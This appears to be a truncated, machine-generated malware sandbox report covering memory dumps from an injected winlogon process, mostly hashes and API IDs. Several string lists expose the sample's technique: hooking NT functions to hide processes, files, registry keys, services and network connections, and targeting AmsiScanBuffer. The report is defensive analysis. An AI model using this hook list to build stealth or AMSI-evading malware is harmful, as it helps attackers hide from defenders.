                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 4afa8d38674c89ef982d105566d5090484a901952933452247f4b34a58aa3c0c
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 4A317076204F9096EB60CFA4E8543EE7360F788749F44852ADB4D57B98EF78C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: abab5ad0d1cbc909871ffb4861a123a704d0a8af35f60ddf638a1379e32f25b9
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 4E31827A205F909AEB60CFA4E8443ED7365F78874AF44812ADB4E47B98EF38C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 8fa4bbfcba876e14dacda529e4a851805128c227666f69b824544af283890819
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: BD41743A218F90E6DB60CF69E84839E73A4F788755F604215EB9D47B98EF38C555CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 5adcafa524db9b9dda6abc00bbd20b9cf03d535e82a6ec1ffaa50773eb971994
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 3341913A214F90A6EB60CF68E8483AE73A4F788755F504625EB9D47B98EF38C555CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: ba0da918b920b46cc3a54e3475de2942f0cc50fd05a53ecf8fda4ebbffebb54b
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 8941933A214F90A6EB60CF69E8443DE73A4F788755F604215EB8D87B98EF38C155CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: d4c58a7ce2da72e66ff3ace40df1018a246c983fc32be65cdbeef41b8fe5e660
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: FAA13C26B1CEA069FB20DBFDE44C3AD7BA5E741B96F14C155DE8A27B99CA34C041C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 066ae2d50c83c03fb0a7661ee4d1289901ef4a01654f13085524b5d77c354e57
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: D2A13A26704EA069FB20DBFDE4483AD6BA0E781B96F14CD15DE9927ED9DE38C049C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 72535559d70cf38c0e92f1948c1c347a54dc7448aa5b502777709f8b5d1bd708
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 3FA15D26704FA079FB20DBFDD4883AD6BA1E741B96F64C115DE99A7BA9CA38C441C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 0548d9b6fff432b0518ac17f6716f417ff667374554f4e73728657456859a9e6
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 06115B2A725F149AEB00CFA4E8583A933A4F719759F440E21EA6D87BA4EF78D154C340
                                                          APIs
                                                            • Part of subcall function 00000225DC64D220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC64C987), ref: 00000225DC64D275
                                                            • Part of subcall function 00000225DC650EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC650EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC64DB99
                                                            • Part of subcall function 00000225DC64D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC64674A), ref: 00000225DC64D2B6
                                                            • Part of subcall function 00000225DC64D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC64674A), ref: 00000225DC64D2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 5649dc98808358dfbd84c4d7499f086ba2f24cef526f849533dea570b867d2bc
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: FD81072A71CEA0A5EB20DFA9E4483AEB791E385BD1F14C165EF9A47BD5DE38C041C700
                                                          APIs
                                                            • Part of subcall function 00000225DC67D220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC67C987), ref: 00000225DC67D275
                                                            • Part of subcall function 00000225DC680EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC680EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC67DB99
                                                            • Part of subcall function 00000225DC67D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC67674A), ref: 00000225DC67D2B6
                                                            • Part of subcall function 00000225DC67D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC67674A), ref: 00000225DC67D2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 2c038651c2ae92960c88feeb5b316e6b4e497a468d42326572a94128b7c2197c
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: E481E63A304EA0A5EB20DBA9E54836EA791F784BD5F04CE15AEAD17FD5DE38C046C700
                                                          APIs
                                                            • Part of subcall function 00000225DC6AD220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC6AC987), ref: 00000225DC6AD275
                                                            • Part of subcall function 00000225DC6B0EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC6B0EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC6ADB99
                                                            • Part of subcall function 00000225DC6AD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC6A674A), ref: 00000225DC6AD2B6
                                                            • Part of subcall function 00000225DC6AD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC6A674A), ref: 00000225DC6AD2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 29c8525217016a3ed37e239d8c2e36f40a7bfde11074850fae087498558bbfe9
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: 5681F82A304FA065EB24DFAAE44839EA791E785BD5F24C115EF99877D5DE38C142C700
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                          • Instruction ID: d37147464f2ba52ae4694af389c00b8e5a18bc58587e02b0b8f105e6f8330097
                                                          • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                          • Instruction Fuzzy Hash: B4119BB56189E196F7AA8F6DD45931977D0E3193D7F84C02DD4498BA94CB3DC4A0DF00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 71e44e630dde731c405f647dad9c2186ef0b895953d0d266fcbe89d85e1081a3
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 9D71003A710E60A5EB10DFA9E85879D23B4FB84B8AF409513DD4E57BA9EF34C445C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 50516736a4d467b6a673d53e6823db0b8cd195352840e3040242fee159b92cf1
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 9D71603A310E64E5EB10DFAAE85869D33B5FB94B8AF449112DE4E83B68EF34C444C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: e6ecbfd54cacd5b4c593c1ac77e66936a6f024f3d5a9e4cde235fe008a8dc896
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 66516C6C514E6AF5FB01EFECEC5D7D42360AB44747F90C91398092A9A5EE7CC25AC382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: ab248220f55d8a8bf603ad1d8e7c18a74e840ae1d8f43e8d78061fc47a12bc73
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 94519AAC194E6AB5EB01EFECED5C7D42762BB50747F90C523A40992661EF3CC25AC390
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: e4fbe600ac6e3f6c3fd389522d33e79d55d6745fab416e8290641ec0d2ad3330
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 16516F36214F94AAE764CFA6E84C35AB7A1F788F9AF548124DE4A07758EF3CC049C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
